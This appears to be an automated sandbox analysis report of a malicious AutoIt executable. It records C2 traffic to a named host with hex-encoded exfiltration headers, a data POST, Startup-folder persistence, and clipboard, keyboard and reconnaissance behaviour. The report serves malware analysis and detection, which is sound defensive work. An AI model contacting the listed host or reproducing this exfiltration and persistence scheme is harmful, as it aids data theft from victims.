Source: global traffic	HTTP traffic detected: GET /search/ HTTP/1.1Host: peerhost59mj7i6macla65r.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80Accept: /X-Reply: 1X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865X-Auth: 2F414C464F4E532D50432F616C666F6E732F32

Source: global traffic

DNS traffic detected: DNS query: peerhost59mj7i6macla65r.com

Source: unknown

HTTP traffic detected: POST /search/ HTTP/1.1Host: peerhost59mj7i6macla65r.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80Accept: */*X-Reply: 1X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865X-Auth: 2F414C464F4E532D50432F616C666F6E732F32X-Sec-Id: 0Content-Length: 17852Content-Type: application/x-www-form-urlencoded

Source: curl.exe, 00000021.00000002.2481616714.0000000003318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/
Source: file.exe, 00000000.00000002.3389486145.0000000001048000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/%
Source: curl.exe, 00000011.00000002.2301039187.00000000032A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/--
Source: curl.exe, 00000007.00000002.2209174796.0000000003078000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/44
Source: curl.exe, 0000000C.00000002.2275900755.0000000003328000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/5iu
Source: curl.exe, 00000019.00000002.2404181964.00000000030D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/7
Source: file.exe, 00000014.00000003.2377965624.00000000016F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/735C417070446174615C526F616D696E675C4D6963726F736F66745C5
Source: file.exe, 00000000.00000003.2211257605.00000000010F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2277109701.0000000001176000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/735C4465736B746F705C66696C652E657865
Source: curl.exe, 0000001D.00000002.2454822807.0000000003738000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/::z
Source: curl.exe, 0000000C.00000002.2275811158.00000000032E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/;
Source: curl.exe, 0000000C.00000002.2275900755.0000000003328000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/Bi
Source: curl.exe, 0000001D.00000002.2454822807.0000000003738000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/E-H
Source: curl.exe, 00000007.00000002.2209174796.0000000003078000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/H
Source: curl.exe, 0000001D.00000002.2454822807.0000000003738000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/K
Source: curl.exe, 00000009.00000002.2244193304.0000000003058000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/T
Source: curl.exe, 00000009.00000002.2244193304.0000000003058000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/Ti
Source: curl.exe, 0000001B.00000002.2429620320.00000000008F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/W
Source: curl.exe, 0000001B.00000002.2429446057.00000000008B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/bB
Source: curl.exe, 00000021.00000002.2481616714.0000000003318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/c
Source: curl.exe, 00000009.00000002.2244193304.0000000003058000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/cb
Source: curl.exe, 00000007.00000002.2209174796.0000000003078000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.2301039187.00000000032A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/cur32.dll
Source: curl.exe, 0000001D.00000003.2454254677.0000000003778000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001D.00000002.2454940776.0000000003778000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/g_
Source: curl.exe, 0000000C.00000002.2275811158.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001B.00000002.2429446057.00000000008B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/n64;
Source: curl.exe, 0000001D.00000003.2454254677.0000000003778000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001D.00000002.2454940776.0000000003778000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/ow-

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49793 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0025EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0025EAFF

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0025ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		0_2_0025ED6A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005BED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		20_2_005BED6A

Source: C:\Users\user\Desktop\file.exe

0_2_0025EAFF

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0024AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_0024AA57

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00279576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		0_2_00279576
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005D9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		20_2_005D9576

System Summary

Binary is likely a compiled AutoIt script file

Source: file.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: file.exe, 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_c85f81e1-4
Source: file.exe, 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_18a44242-8
Source: file.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: file.exe, 00000014.00000000.2361713022.0000000000602000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_1c18c4a7-7
Source: file.exe, 00000014.00000000.2361713022.0000000000602000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_d4df6bea-5
Source: file.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_6d2c1950-a
Source: file.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_e56a4c9f-7
Source: file.exe.11.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_a351ad83-d
Source: file.exe.11.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_2763f376-e

Writes or reads registry keys via WMI

Source: C:\Windows\SysWOW64\systeminfo.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\systeminfo.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0024D5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_0024D5EB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00241201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00241201

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0024E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		0_2_0024E8F6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005AE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		20_2_005AE8F6

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00252046	0_2_00252046
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001E8060	0_2_001E8060
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00248298	0_2_00248298
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0021E4FF	0_2_0021E4FF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0021676B	0_2_0021676B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274873	0_2_00274873
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0020CAA0	0_2_0020CAA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001ECAF0	0_2_001ECAF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001FCC39	0_2_001FCC39
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00216DD9	0_2_00216DD9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001FB119	0_2_001FB119
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001E91C0	0_2_001E91C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00201394	0_2_00201394
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00201706	0_2_00201706
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0020781B	0_2_0020781B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001E7920	0_2_001E7920
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001F997D	0_2_001F997D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002019B0	0_2_002019B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00207A4A	0_2_00207A4A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00201C77	0_2_00201C77
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00207CA7	0_2_00207CA7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0026BE44	0_2_0026BE44
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00219EEE	0_2_00219EEE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00201F32	0_2_00201F32
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001EBF40	0_2_001EBF40
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005B2046	20_2_005B2046
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_00548060	20_2_00548060
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005A8298	20_2_005A8298
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_0057E4FF	20_2_0057E4FF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_0057676B	20_2_0057676B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005D4873	20_2_005D4873
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_0054CAF0	20_2_0054CAF0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_0056CAA0	20_2_0056CAA0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_0055CC39	20_2_0055CC39
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_00576DD9	20_2_00576DD9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_0055B119	20_2_0055B119
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005491C0	20_2_005491C0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_00561394	20_2_00561394
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_00561706	20_2_00561706
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_0056781B	20_2_0056781B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_0055997D	20_2_0055997D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_00547920	20_2_00547920
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005619B0	20_2_005619B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_00567A4A	20_2_00567A4A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_00561C77	20_2_00561C77
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_00567CA7	20_2_00567CA7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005CBE44	20_2_005CBE44
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_00579EEE	20_2_00579EEE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_0054BF40	20_2_0054BF40
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_00561F32	20_2_00561F32

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe 5270C4C6881B7D3EBAEA8F51C410BBA8689ACB67C34F20440527A5F15F3BC1E4

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00200A30 appears 46 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 001FF9F2 appears 40 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 001E9CB3 appears 31 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: String function: 00549CB3 appears 31 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: String function: 00560A30 appears 46 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: String function: 0055F9F2 appears 40 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: tmp.txt.1.dr

Binary string: Boot Device: \Device\HarddiskVolume1

Source: classification engine

Classification label: mal100.spre.adwa.spyw.evad.winEXE@48/4@1/2

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_002537B5 GetLastError,FormatMessageW,

0_2_002537B5

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002410BF AdjustTokenPrivileges,CloseHandle,	0_2_002410BF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002416C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_002416C3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005A10BF AdjustTokenPrivileges,CloseHandle,	20_2_005A10BF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005A16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	20_2_005A16C3

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_002551CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_002551CD

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0026A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0026A67C

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0025648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0025648E

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_001E42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_001E42A2

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

Jump to behavior

